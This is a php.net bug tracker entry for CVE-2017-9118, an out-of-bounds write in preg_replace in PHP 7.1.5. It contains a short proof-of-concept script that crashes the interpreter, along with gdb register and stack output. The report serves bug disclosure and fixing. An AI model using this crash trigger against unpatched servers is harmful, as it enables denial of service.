|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull Requests
Pull requests:
HistoryAllCommentsChangesGit/SVN commits
[2017-05-23 01:26 UTC] whitehat002 at hotmail dot com
[2017-06-20 06:18 UTC] stas@php.net
-Type: Security
+Type: Bug
[2018-08-03 03:35 UTC] kaplan@php.net
-CVE-ID:
+CVE-ID: 2017-9118
[2018-12-08 11:20 UTC] cmb@php.net
[2021-10-20 12:05 UTC] cmb@php.net
[2021-10-20 12:07 UTC] cmb@php.net
-Status: Open
+Status: Verified
-Assigned To:
+Assigned To: cmb
[2021-11-29 18:19 UTC] git@php.net
[2021-11-29 18:19 UTC] git@php.net
-Status: Verified
+Status: Closed
|
|||||||||||||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Thu Oct 30 18:00:02 2025 UTC |
Description: ------------ It seems to be an out of bounds bug. Test script: --------------- <?php ini_set('memory_limit',-1); $str=str_repeat("A",0x7ffffffe); preg_replace("/A/i",$str,"AAAAAAAAAAAAAAAAAA"); Expected result: ---------------- no crash Actual result: -------------- root@hackyzh-virtual-machine:~# gdb -q --args ./php-7.1.5/sapi/cli/php -n poc2.php Reading symbols from /root/php-7.1.5/sapi/cli/php...done. gdb-peda$ r [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x36dfdfb0 ('A' <repeats 200 times>...) EBX: 0xb7200000 ECX: 0x0 EDX: 0x41 ('A') ESI: 0x41 ('A') EDI: 0xb6c0000d --> 0x0 EBP: 0xbfffbf98 --> 0xb7013100 ('A' <repeats 200 times>...) ESP: 0xbfffbe90 --> 0xb7002060 ('A' <repeats 200 times>...) EIP: 0x8106c7d (<php_pcre_replace_impl+941>: mov BYTE PTR [ebx],dl) EFLAGS: 0x210293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x8106c75 <php_pcre_replace_impl+933>: jne 0x8106cb8 <php_pcre_replace_impl+1000> 0x8106c77 <php_pcre_replace_impl+935>: mov eax,DWORD PTR [ebp-0x24] 0x8106c7a <php_pcre_replace_impl+938>: movzx edx,BYTE PTR [eax] => 0x8106c7d <php_pcre_replace_impl+941>: mov BYTE PTR [ebx],dl 0x8106c7f <php_pcre_replace_impl+943>: lea edx,[eax+0x1] 0x8106c82 <php_pcre_replace_impl+946>: add ebx,0x1 0x8106c85 <php_pcre_replace_impl+949>: mov DWORD PTR [ebp-0x24],edx 0x8106c88 <php_pcre_replace_impl+952>: movzx esi,BYTE PTR [eax] [------------------------------------stack-------------------------------------] 0000| 0xbfffbe90 --> 0xb7002060 ('A' <repeats 200 times>...) 0004| 0xbfffbe94 --> 0xb7068048 ('A' <repeats 200 times>...) 0008| 0xbfffbe98 --> 0x0 0012| 0xbfffbe9c --> 0x20 (' ') 0016| 0xbfffbea0 --> 0x0 0020| 0xbfffbea4 --> 0x0 0024| 0xbfffbea8 --> 0xbfffbeb0 --> 0x0 0028| 0xbfffbeac --> 0x3 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV php_pcre_replace_impl (pce=0x8bb1b30, subject_str=0xb7068038, subject=0xb7068048 'A' <repeats 200 times>..., subject_len=0x20, replace_val=0xb7013110, is_callable_replace=0x0, limit=0xffffffff, replace_count=0xbfffc08c) at /root/php-7.1.5/ext/pcre/php_pcre.c:1317 1317 *walkbuf++ = *walk++; gdb-peda$ x/s $ebx 0xb7200000: <Address 0xb7200000 out of bounds>